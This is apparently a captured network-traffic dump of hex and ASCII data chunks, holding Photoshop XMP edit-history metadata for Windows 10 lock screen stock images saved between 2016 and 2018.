                                                                                                                                                                                    2023-01-05 07:58:10 UTC897INData Raw: 72 61 69 74 2e 70 73 64 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 36 2d 30 38 2d 32 39 54 31 30 3a 31 38 3a 30 38 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4f 66 66 69 63 65 5c 43 72 6f 70 73 5c 4f 66 66 69 63 65 5f 35 30 30 70 78 2d 38 36 35 38 36 35 35 39 5f 31 30 38 30 78 31 39 32 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 36 2d 30 38 2d 32 39 54 31 30 3a 32 30 3a 31 32 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4f 66 66 69 63 65 5c 43 72 6f 70 73 5c 4f 66 66 69 63 65 5f 35 30 30 70 78 2d 31 30 34 37 37 34 33 33 35 5f 31 30 38 30 78 31 39 32 30
                                                                                                                                                                                    Data Ascii: rait.psd saved&#xA;2016-08-29T10:18:08-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Office\Crops\Office_500px-86586559_1080x1920.jpg saved&#xA;2016-08-29T10:20:12-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Office\Crops\Office_500px-104774335_1080x1920
                                                                                                                                                                                    2023-01-05 07:58:10 UTC984INData Raw: 44 46 35 33 38 45 43 44 33 39 43 34 43 43 46 43 2e 70 73 62 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 36 2d 31 30 2d 31 32 54 31 35 3a 34 36 3a 30 38 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4d 6f 6d 65 6e 74 73 49 6e 54 69 6d 65 5c 56 65 74 65 72 61 6e 73 44 61 79 5c 4d 49 54 2d 56 65 74 65 72 61 6e 73 44 61 79 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 31 35 37 31 36 30 33 38 35 5f 31 30 38 30 78 31 39 32 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 36 2d 31 30 2d 31 32 54 31 35 3a 35 35 3a 31 36 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 41
                                                                                                                                                                                    Data Ascii: DF538ECD39C4CCFC.psb saved&#xA;2016-10-12T15:46:08-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\MomentsInTime\VeteransDay\MIT-VeteransDay_GettyImages-157160385_1080x1920.jpg saved&#xA;2016-10-12T15:55:16-07:00&#x9;File C:\Users\v-lizagh\AppData\Roaming\A
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1111INData Raw: 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 41 64 6f 62 65 5c 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 35 2e 35 5c 41 75 74 6f 52 65 63 6f 76 65 72 5c 5f 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 30 38 30 78 31 39 32 30 5f 50 6f 72 74 72 61 69 74 46 30 31 39 34 34 45 44 31 42 37 43 33 38 42 38 44 46 35 33 38 45 43 44 33 39 43 34 43 43 46 43 2e 70 73 62 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 36 2d 31 31 2d 30 32 54 32 32 3a 33 31 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 30 38 30 78 31 39 32 30 5f 50 6f 72 74 72 61 69 74 2e
                                                                                                                                                                                    Data Ascii: 9;File C:\Users\v-lizagh\AppData\Roaming\Adobe\Adobe Photoshop CC 2015.5\AutoRecover\_Lockscreen_1080x1920_PortraitF01944ED1B7C38B8DF538ECD39C4CCFC.psb saved&#xA;2016-11-02T22:31-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Lockscreen_1080x1920_Portrait.
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1127INData Raw: 72 5c 5f 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 30 38 30 78 31 39 32 30 5f 50 6f 72 74 72 61 69 74 46 30 31 39 34 34 45 44 31 42 37 43 33 38 42 38 44 46 35 33 38 45 43 44 33 39 43 34 43 43 46 43 2e 70 73 62 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 31 2d 30 34 54 31 37 3a 35 37 3a 34 37 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 30 38 30 78 31 39 32 30 5f 50 6f 72 74 72 61 69 74 2e 70 73 64 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 31 2d 31 31 54 31 30 3a 34 30 3a 30 36 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 30 38 30 78 31 39 32 30 5f 50 6f 72 74 72 61 69 74 2e 70
                                                                                                                                                                                    Data Ascii: r\_Lockscreen_1080x1920_PortraitF01944ED1B7C38B8DF538ECD39C4CCFC.psb saved&#xA;2017-01-04T17:57:47-08:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Lockscreen_1080x1920_Portrait.psd saved&#xA;2017-01-11T10:40:06-08:00&#x9;File Lockscreen_1080x1920_Portrait.p
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1159INData Raw: 39 32 30 5f 50 6f 72 74 72 61 69 74 2e 70 73 64 20 6f 70 65 6e 65 64 26 23 78 41 3b 32 30 31 37 2d 30 32 2d 32 31 54 31 38 3a 35 33 3a 31 34 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4d 6f 6d 65 6e 74 73 49 6e 54 69 6d 65 5c 57 6f 6d 65 6e 73 4d 6f 6e 74 68 5c 43 48 4f 53 45 4e 5c 4d 49 54 2d 57 6f 6d 65 6e 73 4d 6f 6e 74 68 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 35 34 35 34 35 36 39 32 30 5f 31 30 38 30 78 31 39 32 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 32 2d 32 31 54 31 38 3a 35 35 3a 34 35 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c
                                                                                                                                                                                    Data Ascii: 920_Portrait.psd opened&#xA;2017-02-21T18:53:14-08:00&#x9;File C:\Users\v-lizagh\MS\Windows10\MomentsInTime\WomensMonth\CHOSEN\MIT-WomensMonth_GettyImages-545456920_1080x1920.jpg saved&#xA;2017-02-21T18:55:45-08:00&#x9;File C:\Users\v-lizagh\MS\Windows10\
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1569INData Raw: 79 49 6d 61 67 65 73 2d 31 35 39 31 35 30 36 31 39 5f 31 30 38 30 78 31 39 32 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 33 2d 30 36 54 31 33 3a 32 35 3a 32 34 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 41 64 6f 62 65 5c 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 35 2e 35 5c 41 75 74 6f 52 65 63 6f 76 65 72 5c 5f 43 6f 72 74 61 6e 61 2d 53 70 6f 74 6c 69 67 68 74 5f 35 30 30 70 78 2d 31 33 38 36 32 33 31 30 35 5f 31 30 38 30 78 31 39 32 30 31 39 46 34 46 36 43 45 39 37 32 43 46 31 41 38 42 43 42 44 45 36 45 41 44 30 44 31 39 38 41 46 2e 70 73 62 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 33 2d 30
                                                                                                                                                                                    Data Ascii: yImages-159150619_1080x1920.jpg saved&#xA;2017-03-06T13:25:24-08:00&#x9;File C:\Users\v-lizagh\AppData\Roaming\Adobe\Adobe Photoshop CC 2015.5\AutoRecover\_Cortana-Spotlight_500px-138623105_1080x192019F4F6CE972CF1A8BCBDE6EAD0D198AF.psb saved&#xA;2017-03-0
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1633INData Raw: 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 42 69 6e 67 5c 42 69 6e 67 41 74 57 6f 72 6b 5c 43 48 4f 53 45 4e 5c 42 69 6e 67 41 74 57 6f 72 6b 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 35 38 38 36 30 33 34 32 34 5f 31 30 38 30 78 31 39 32 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 34 2d 31 32 54 31 32 3a 30 34 3a 34 39 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 42 69 6e 67 5c 42 69 6e 67 41 74 57 6f 72 6b 5c 43 48 4f 53 45 4e 5c 42 69 6e 67 41 74 57 6f 72 6b 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 35 38 38 36 30 33 34 32 34 5f 31 30 38 30 78 31 39 32 30 2e 6a 70 67 20 73 61 76 65 64 26 23
                                                                                                                                                                                    Data Ascii: C:\Users\v-lizagh\MS\Windows10\Bing\BingAtWork\CHOSEN\BingAtWork_GettyImages-588603424_1080x1920.jpg saved&#xA;2017-04-12T12:04:49-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Bing\BingAtWork\CHOSEN\BingAtWork_GettyImages-588603424_1080x1920.jpg saved&#
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1649INData Raw: 37 2d 30 35 2d 31 32 54 30 39 3a 31 33 3a 34 32 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 30 38 30 78 31 39 32 30 5f 50 6f 72 74 72 61 69 74 2e 70 73 64 20 6f 70 65 6e 65 64 26 23 78 41 3b 32 30 31 37 2d 30 35 2d 31 32 54 30 39 3a 32 39 3a 33 39 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 43 6f 72 74 61 6e 61 5c 54 61 73 6b 62 61 72 53 65 61 72 63 68 5c 43 68 6f 73 65 6e 5c 43 72 6f 70 73 5c 43 6f 72 74 61 6e 61 2d 54 61 73 6b 62 61 72 53 65 61 72 63 68 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 36 34 31 36 39 32 31 33 34 5f 31 30 38 30 78 31 39 32 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 35 2d 31
                                                                                                                                                                                    Data Ascii: 7-05-12T09:13:42-07:00&#x9;File Lockscreen_1080x1920_Portrait.psd opened&#xA;2017-05-12T09:29:39-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Cortana\TaskbarSearch\Chosen\Crops\Cortana-TaskbarSearch_GettyImages-641692134_1080x1920.jpg saved&#xA;2017-05-1
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1656INData Raw: 30 31 37 2d 30 35 2d 32 35 54 32 32 3a 30 30 3a 34 34 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 44 72 6f 70 62 6f 78 20 28 41 71 75 65 6e 74 29 5c 52 68 79 73 5c 57 69 6e 64 6f 77 73 31 30 2d 4c 6f 63 6b 5c 4c 6f 63 6b 32 30 31 37 5f 42 61 74 63 68 35 5f 53 41 2d 41 46 5c 43 72 6f 70 73 5c 4c 6f 63 6b 32 30 31 37 2d 42 35 5f 41 46 5f 41 63 61 63 69 61 54 72 65 65 73 4b 65 6e 79 61 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 31 38 35 33 31 33 32 34 37 5f 31 30 38 30 78 31 39 32 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 35 2d 32 35 54 32 32 3a 30 32 3a 33 37 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 44 72 6f 70 62 6f 78
                                                                                                                                                                                    Data Ascii: 017-05-25T22:00:44-07:00&#x9;File C:\Users\v-lizagh\Dropbox (Aquent)\Rhys\Windows10-Lock\Lock2017_Batch5_SA-AF\Crops\Lock2017-B5_AF_AcaciaTreesKenya_GettyImages-185313247_1080x1920.jpg saved&#xA;2017-05-25T22:02:37-07:00&#x9;File C:\Users\v-lizagh\Dropbox
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1696INData Raw: 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4d 6f 6d 65 6e 74 73 49 6e 54 69 6d 65 5c 42 61 63 6b 54 6f 53 63 68 6f 6f 6c 5c 43 68 6f 73 65 6e 5c 4d 49 54 2d 42 61 63 6b 54 6f 53 63 68 6f 6f 6c 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 34 39 37 34 31 38 32 35 38 5f 31 30 38 30 78 31 39 32 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 37 2d 31 31 54 31 33 3a 30 34 3a 35 38 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4d 6f 6d 65 6e 74 73 49 6e 54 69 6d 65 5c 42 61 63 6b 54 6f 53 63 68 6f 6f 6c 5c 43 68 6f 73 65 6e 5c 4d 49 54 2d 42 61 63 6b 54 6f 53 63 68 6f 6f 6c 5f 47 65
                                                                                                                                                                                    Data Ascii: x9;File C:\Users\v-lizagh\MS\Windows10\MomentsInTime\BackToSchool\Chosen\MIT-BackToSchool_GettyImages-497418258_1080x1920.jpg saved&#xA;2017-07-11T13:04:58-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\MomentsInTime\BackToSchool\Chosen\MIT-BackToSchool_Ge
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1815INData Raw: 3a 35 38 3a 32 34 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 30 38 30 78 31 39 32 30 5f 50 6f 72 74 72 61 69 74 2e 70 73 64 20 6f 70 65 6e 65 64 26 23 78 41 3b 32 30 31 37 2d 30 38 2d 30 32 54 31 36 3a 30 35 3a 32 30 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 42 69 6e 67 45 64 67 65 47 72 6f 77 74 68 49 6d 61 67 65 73 5c 4c 6f 63 6b 32 30 31 37 5f 42 61 74 63 68 36 5c 5f 43 48 4f 53 45 4e 5c 43 72 6f 70 73 5c 4c 6f 63 6b 32 30 31 37 2d 42 36 5f 4e 61 74 75 72 61 6c 50 6f 6f 6c 4d 74 52 6f 72 61 69 6d 61 56 45 5f 4f 66 66 73 65 74 5f 33 32 34 31 34 5f 31 30 38 30 78 31 39 32 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41
                                                                                                                                                                                    Data Ascii: :58:24-07:00&#x9;File Lockscreen_1080x1920_Portrait.psd opened&#xA;2017-08-02T16:05:20-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\BingEdgeGrowthImages\Lock2017_Batch6\_CHOSEN\Crops\Lock2017-B6_NaturalPoolMtRoraimaVE_Offset_32414_1080x1920.jpg saved&#xA
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1823INData Raw: 72 65 65 6e 5f 31 30 38 30 78 31 39 32 30 5f 50 6f 72 74 72 61 69 74 2e 70 73 64 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 30 38 2d 32 39 54 31 32 3a 33 39 3a 31 34 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 30 38 30 78 31 39 32 30 5f 50 6f 72 74 72 61 69 74 2e 70 73 64 20 6f 70 65 6e 65 64 26 23 78 41 3b 32 30 31 37 2d 30 38 2d 32 39 54 31 32 3a 35 36 3a 35 35 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 43 6f 72 74 61 6e 61 5c 4d 6f 74 69 76 61 74 69 6f 6e 61 6c 2d 43 61 6d 70 61 69 67 6e 5c 43 68 6f 73 65 6e 5c 43 72 6f 70 73 5c 51 75 6f 74 65 44 61 79 48 69 73 74 6f 72 79 5f 47 65 74 74 79 49 6d 61 67 65 73 2d
                                                                                                                                                                                    Data Ascii: reen_1080x1920_Portrait.psd saved&#xA;2017-08-29T12:39:14-07:00&#x9;File Lockscreen_1080x1920_Portrait.psd opened&#xA;2017-08-29T12:56:55-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Cortana\Motivational-Campaign\Chosen\Crops\QuoteDayHistory_GettyImages-
                                                                                                                                                                                    2023-01-05 07:58:10 UTC1871INData Raw: 52 65 63 6f 76 65 72 5c 5f 4d 49 54 2d 50 6f 73 74 57 53 57 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 37 38 33 38 38 31 31 38 5f 31 30 38 30 78 31 39 32 30 45 35 36 38 33 36 34 46 30 32 31 42 45 41 42 43 34 31 32 36 34 39 42 34 45 46 33 41 45 46 45 37 2e 70 73 62 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 31 30 2d 32 30 54 31 37 3a 32 30 3a 31 36 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 30 38 30 78 31 39 32 30 5f 50 6f 72 74 72 61 69 74 2e 70 73 64 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 31 30 2d 32 30 54 31 37 3a 35 36 3a 35 30 2d 30 37 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c
                                                                                                                                                                                    Data Ascii: Recover\_MIT-PostWSW_GettyImages-78388118_1080x1920E568364F021BEABC412649B4EF3AEFE7.psb saved&#xA;2017-10-20T17:20:16-07:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Lockscreen_1080x1920_Portrait.psd saved&#xA;2017-10-20T17:56:50-07:00&#x9;File C:\Users\v-l
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2462INData Raw: 41 3b 32 30 31 37 2d 31 31 2d 32 32 54 31 31 3a 34 35 3a 32 38 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 30 38 30 78 31 39 32 30 5f 50 6f 72 74 72 61 69 74 2e 70 73 64 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 31 31 2d 32 38 54 31 34 3a 33 32 3a 30 33 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 30 38 30 78 31 39 32 30 5f 50 6f 72 74 72 61 69 74 2e 70 73 64 20 6f 70 65 6e 65 64 26 23 78 41 3b 32 30 31 37 2d 31 31 2d 32 38 54 31 34 3a 33 37 3a 32 38 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73
                                                                                                                                                                                    Data Ascii: A;2017-11-22T11:45:28-08:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Lockscreen_1080x1920_Portrait.psd saved&#xA;2017-11-28T14:32:03-08:00&#x9;File Lockscreen_1080x1920_Portrait.psd opened&#xA;2017-11-28T14:37:28-08:00&#x9;File C:\Users\v-lizagh\MS\Windows
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2486INData Raw: 78 39 3b 46 69 6c 65 20 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 30 38 30 78 31 39 32 30 5f 50 6f 72 74 72 61 69 74 2e 70 73 64 20 6f 70 65 6e 65 64 26 23 78 41 3b 32 30 31 37 2d 31 32 2d 31 33 54 31 31 3a 30 32 3a 33 33 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 42 69 6e 67 5c 46 46 5f 42 69 6e 67 41 77 61 72 65 6e 65 73 73 2d 53 74 65 76 65 5c 43 48 4f 53 45 4e 5c 46 46 2d 42 69 6e 67 41 77 61 72 65 6e 65 73 73 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 34 36 39 33 31 38 30 31 31 5f 31 30 38 30 78 31 39 32 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 37 2d 31 32 2d 31 33 54 31 31 3a 30 33 3a 31 38 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c
                                                                                                                                                                                    Data Ascii: x9;File Lockscreen_1080x1920_Portrait.psd opened&#xA;2017-12-13T11:02:33-08:00&#x9;File C:\Users\v-lizagh\MS\Windows10\Bing\FF_BingAwareness-Steve\CHOSEN\FF-BingAwareness_GettyImages-469318011_1080x1920.jpg saved&#xA;2017-12-13T11:03:18-08:00&#x9;File C:\
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2565INData Raw: 30 38 30 78 31 39 32 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 38 2d 30 31 2d 31 39 54 31 31 3a 33 35 3a 33 39 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 42 69 6e 67 45 64 67 65 47 72 6f 77 74 68 49 6d 61 67 65 73 5c 4c 6f 63 6b 32 30 31 37 2d 42 61 74 63 68 31 30 5f 50 4f 41 5c 43 48 4f 53 45 4e 5c 43 72 6f 70 73 5c 4c 6f 63 6b 32 30 31 37 2d 42 31 30 5f 41 6d 75 73 65 6d 65 6e 74 50 61 72 6b 53 61 6e 74 61 4d 6f 6e 69 63 61 43 41 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 31 37 34 38 33 30 34 34 34 5f 31 30 38 30 78 31 39 32 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 38 2d 30 31 2d 31 39 54 31 31 3a 34 30 3a 33 39 2d 30 38 3a 30 30
                                                                                                                                                                                    Data Ascii: 080x1920.jpg saved&#xA;2018-01-19T11:35:39-08:00&#x9;File C:\Users\v-lizagh\MS\Windows10\BingEdgeGrowthImages\Lock2017-Batch10_POA\CHOSEN\Crops\Lock2017-B10_AmusementParkSantaMonicaCA_GettyImages-174830444_1080x1920.jpg saved&#xA;2018-01-19T11:40:39-08:00
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2581INData Raw: 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4d 49 54 2d 49 6e 74 65 72 6e 61 74 69 6f 6e 61 6c 5c 4f 6c 79 6d 70 69 63 73 2d 55 4b 5c 43 48 4f 53 45 4e 5c 43 72 6f 70 73 5c 4d 49 54 2d 55 4b 2d 57 69 6e 74 65 72 4f 6c 79 6d 70 69 63 73 5f 47 65 74 74 79 49 6d 61 67 65 73 2d 36 34 34 35 35 32 32 39 32 5f 31 30 38 30 78 31 39 32 30 2e 6a 70 67 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 38 2d 30 32 2d 31 35 54 31 32 3a 33 30 3a 35 38 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 4d 49 54 2d 49 6e 74 65 72 6e 61 74 69 6f 6e 61 6c 5c 4f 6c 79 6d 70 69 63 73 2d 55 4b 5c 43 48 4f 53 45 4e 5c 43
                                                                                                                                                                                    Data Ascii: #x9;File C:\Users\v-lizagh\MS\Windows10\MIT-International\Olympics-UK\CHOSEN\Crops\MIT-UK-WinterOlympics_GettyImages-644552292_1080x1920.jpg saved&#xA;2018-02-15T12:30:58-08:00&#x9;File C:\Users\v-lizagh\MS\Windows10\MIT-International\Olympics-UK\CHOSEN\C
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2589INData Raw: 3b 32 30 31 38 2d 30 33 2d 30 31 54 31 36 3a 34 37 3a 35 31 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 30 38 30 78 31 39 32 30 5f 50 6f 72 74 72 61 69 74 2e 70 73 64 20 63 6c 6f 73 65 64 26 23 78 41 3b 32 30 31 38 2d 30 33 2d 30 31 54 31 36 3a 34 37 3a 35 31 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 43 3a 5c 55 73 65 72 73 5c 76 2d 6c 69 7a 61 67 68 5c 4d 53 5c 57 69 6e 64 6f 77 73 31 30 5c 5f 5f 54 65 6d 70 6c 61 74 65 73 5c 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 30 38 30 78 31 39 32 30 5f 50 6f 72 74 72 61 69 74 2e 70 73 64 20 73 61 76 65 64 26 23 78 41 3b 32 30 31 38 2d 30 33 2d 30 37 54 31 38 3a 30 39 3a 31 39 2d 30 38 3a 30 30 26 23 78 39 3b 46 69 6c 65 20 4c 6f 63 6b 73 63 72 65 65 6e 5f 31 30 38 30 78 31
                                                                                                                                                                                    Data Ascii: ;2018-03-01T16:47:51-08:00&#x9;File Lockscreen_1080x1920_Portrait.psd closed&#xA;2018-03-01T16:47:51-08:00&#x9;File C:\Users\v-lizagh\MS\Windows10\__Templates\Lockscreen_1080x1920_Portrait.psd saved&#xA;2018-03-07T18:09:19-08:00&#x9;File Lockscreen_1080x1
                                                                                                                                                                                    2023-01-05 07:58:10 UTC2605INData Raw: 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 30 31 43 46 43 35 35 37 37 38 43 37 36 32 39 37 32 42 37 30 42 37 42 32 44 42 31 33 34 37 42 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 30 31 44 43 43 37 45 33 31 41 44 30 36 44 31 39 46 42 35 36 43 34 42 42 41 30 35 34 45 36 46 38 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 30 31 44 44 32 43 45 46 45 45 43 36 33 41 32 34 44 30 45 44 43 39 45 44 46 42 38 43 41 33 46 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 30 31 44 45 39 44 30 38 37 38 41 42 33 43 31 42 45 42 38 44 43 34 45 34 35 44 39 30 42 33 45 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 30 31 44 46 45 42 35 42 33 30 42 35 32 39 43 45 30 41 42 42 45 37 44 32 34 39 44 36 32 41 32 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c
